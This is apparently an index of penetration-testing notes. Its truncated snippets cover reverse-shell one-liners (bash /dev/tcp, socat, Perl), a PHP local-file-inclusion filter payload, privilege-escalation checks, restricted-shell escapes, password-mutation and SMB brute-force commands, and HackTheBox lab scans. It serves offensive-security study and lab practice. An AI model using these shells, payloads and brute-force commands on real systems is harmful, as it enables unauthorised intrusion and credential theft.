Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Socat socat -d -d TCP4-LISTEN:443 STDOUT socat TCP4:<ip>:443 EXEC:/bin/bash Perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;s...
Local File Inclusion
PHP php://filter/convert.base64-encode/resource=<php file>
Linux Privilege Escalation
Tools LinPEAS Linux-exploit-suggester-2.pl User id whoami Services What programs are running as root? - ps aux | grep "^root" Are any passwords exposed? If so, are the password...
HackTheBox - Legacy
Enumeration Port Scan $ cat nmap/initial.nmap # Nmap 7.91 scan initiated Wed Feb 17 20:35:39 2021 as: nmap -sC -sV -oA nmap/initial 10.129.100.11 Nmap scan report for 10.129.100.11...
HackTheBox - Lame
Enumeration Port Scan $ nmap -sC -sV -oA nmap/initial 10.129.99.83 # Nmap 7.91 scan initiated Tue Feb 16 19:19:05 2021 as: nmap -sC -sV -oA nmap/initial 10.129.99.83 Nmap scan report for 10.129.9...
HackTheBox - Bashed
Enumeration Port Scan $ nmap -sC -sV -oA nmap/initial 10.129.96.217 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:00 EST Nmap scan report for 10.129.96.217 Host is up (0.079s latency)....
Wordpress
Vulnerability Scan wpscan -u <url> Enumerate Users wpscan -u <url> --enumerate u
Password Cracking
Password Mutations for i in $(cat <pw file>); do echo $i; echo ${i}<year>; done hashcat --force --stdout <pw file> -r /usr/share/hashcat/rules/best64.rule hashcat --force --stdou...
Restricted Shell Escapes
Additional Resources: GTFOBins Spawning /bin/bash -p /bin/sh Copy cp /bin/bash . /bin/bash -p cp /bin/sh . /bin/sh python python -c 'i...
SMB
Standard Port: 445/tcp Connect smbclient -L <ip> Password Policy crackmapexec smb <ip> --pass-pol -u '' -p '' Password Bruteforce crackmapexec smb <ip> -u <...